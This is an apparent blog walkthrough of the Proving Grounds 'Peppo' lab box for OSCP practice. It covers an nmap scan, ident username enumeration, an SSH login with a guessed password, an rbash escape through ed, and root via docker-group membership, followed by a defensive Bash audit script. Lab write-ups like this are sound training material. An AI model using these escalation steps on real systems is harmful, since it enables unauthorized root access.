Proving Grounds: Peppo

Al1z4deh:~# echo "Welcome"
3 min read, Jan 20, 2023

Today we will take a look at Proving Grounds: Peppo. My purpose in sharing this post is to prepare for the OSCP exam, and to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network
PORT      STATE SERVICE           VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey:
| 2048 754c0201fa1e9fcce47b52feba3685a9 (RSA)
| 256 b76f9c2bbffb0462f418c938f43d6b2b (ECDSA)
|_ 256 987fb640cebbb557d5d13c65727487c3 (ED25519)
113/tcp open ident FreeBSD identd
|_auth-owners: nobody
5432/tcp open postgresql PostgreSQL DB 12.3 - 12.4
8080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
| http-robots.txt: 4 disallowed entries
|_/issues/gantt /issues/calendar /activity /search
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
|_http-title: Redmine
10000/tcp open snet-sensor-mgmt?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| HTTP/1.1 400 Bad Request
| Connection: close
| FourOhFourRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Fri, 20 Jan 2023 11:29:37 GMT
| Connection: close
| Hello World
| GetRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Fri, 20 Jan 2023 11:29:26 GMT
| Connection: close
| Hello World
| HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Fri, 20 Jan 2023 11:29:27 GMT
| Connection: close
|_ Hello World
|_auth-owners: eleanor
  • 113 (FreeBSD identd)

Use the ident service to enumerate which user owns the listening ports.

└─$ ident-user-enum 192.168.60.60 10000
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )

192.168.60.60:10000 eleanor

Or you can read the same username straight from the nmap output (the auth-owners script):

|_auth-owners: eleanor
  • eleanor

I searched hard after finding eleanor, but there was one small thing I missed: eleanor had used her own name as her password.

Log in with SSH:

eleanor:eleanor

eleanor@peppo:~$ cat local.txt
-rbash: cat: command not found

The shell is restricted (rbash), and PATH is limited to a private bin directory:

eleanor@peppo:~$ id
-rbash: id: command not found
eleanor@peppo:~$ echo $PATH
/home/eleanor/bin
eleanor@peppo:~$ ls -la bin
total 8
drwxr-xr-x 2 eleanor eleanor 4096 Jun 1 2020 .
drwxr-xr-x 4 eleanor eleanor 4096 Jan 20 07:21 ..
lrwxrwxrwx 1 root root 10 Jun 1 2020 chmod -> /bin/chmod
lrwxrwxrwx 1 root root 10 Jun 1 2020 chown -> /bin/chown
lrwxrwxrwx 1 root root 7 Jun 1 2020 ed -> /bin/ed
lrwxrwxrwx 1 root root 7 Jun 1 2020 ls -> /bin/ls
lrwxrwxrwx 1 root root 7 Jun 1 2020 mv -> /bin/mv
lrwxrwxrwx 1 root root 9 Jun 1 2020 ping -> /bin/ping
lrwxrwxrwx 1 root root 10 Jun 1 2020 sleep -> /bin/sleep
lrwxrwxrwx 1 root root 14 Jun 1 2020 touch -> /usr/bin/touch

Use ed, a command-line editor that is available in the restricted bin directory, to escape the jail, then restore a normal PATH:
eleanor@peppo:~$ ed
!/bin/bash
eleanor@peppo:~$ export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
  • Privesc (docker)

eleanor@peppo:~$ id
uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)

eleanor is a member of the docker group (gid 999).

Use this to get root, following the GTFOBins entry for docker:

https://gtfobins.github.io/gtfobins/docker/#shell

eleanor@peppo:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
redmine latest 0c8429c66e07 2 years ago 542MB
postgres latest adf2b126dda8 2 years ago 313MB
eleanor@peppo:~$ docker run -v /:/mnt --rm -it redmine chroot /mnt bash
root@7fb1c5126951:/# whoami
root

And now we are root.
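Both footholds used on this box, the rbash account with ed reachable in its private bin directory and the docker-group membership, are easy to audit for on a Debian host. The Bash helper below is an added example, not part of the original write-up; the passwd/group contents and the home-directory layout it checks are constructed samples modelled on the box, and the file paths are passed as parameters so the checks can run against copies of the real files or a mounted image.

```shell
#!/bin/bash
# Added audit helper (not from the original write-up). Flags the two
# conditions exploited on Peppo: non-root members of the docker group
# (effectively root) and rbash accounts whose private bin directory
# exposes an editor with a shell escape (ed).

# Constructed sample passwd/group files modelled on the box, not copied from it.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/group" <<'EOF'
root:x:0:
sudo:x:27:
docker:x:999:eleanor,bob
EOF
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
eleanor:x:1000:1000::/home/eleanor:/bin/rbash
bob:x:1001:1001::/home/bob:/bin/bash
EOF

# Print the members of the docker group from a group file, one per line.
docker_group_members() {
    awk -F: '$1 == "docker" && $4 != "" { n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i] }' "$1"
}

# Print accounts whose login shell is rbash, one per line.
rbash_users() {
    awk -F: '$7 ~ /\/rbash$/ { print $1 }' "$1"
}

# For an rbash user's home directory, print entries of $HOME/bin that resolve
# to ed (the editor used for the escape above). Returns 1 when none are found.
escape_editors_in_bin() {
    local bindir="$1/bin" found=1 f target
    for f in "$bindir"/*; do
        [ -L "$f" ] || [ -e "$f" ] || continue
        target=$(readlink -f "$f" 2>/dev/null || printf '%s' "$f")
        case "$(basename "$target")" in
            ed) printf '%s\n' "$f"; found=0 ;;
        esac
    done
    return "$found"
}

# Human-readable summary: both Peppo findings show up here.
audit_report() {
    printf 'docker group members: %s\n' "$(docker_group_members "$2" | paste -sd, -)"
    printf 'rbash accounts: %s\n' "$(rbash_users "$1" | paste -sd, -)"
}
audit_report "$SAMPLE_DIR/passwd" "$SAMPLE_DIR/group"
```

Run it against /etc/passwd and /etc/group on a real host; any non-root docker member or rbash user whose bin directory lists an entry is worth a closer look.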

“If you have any questions or comments, please do not hesitate to write. Have a good day.”
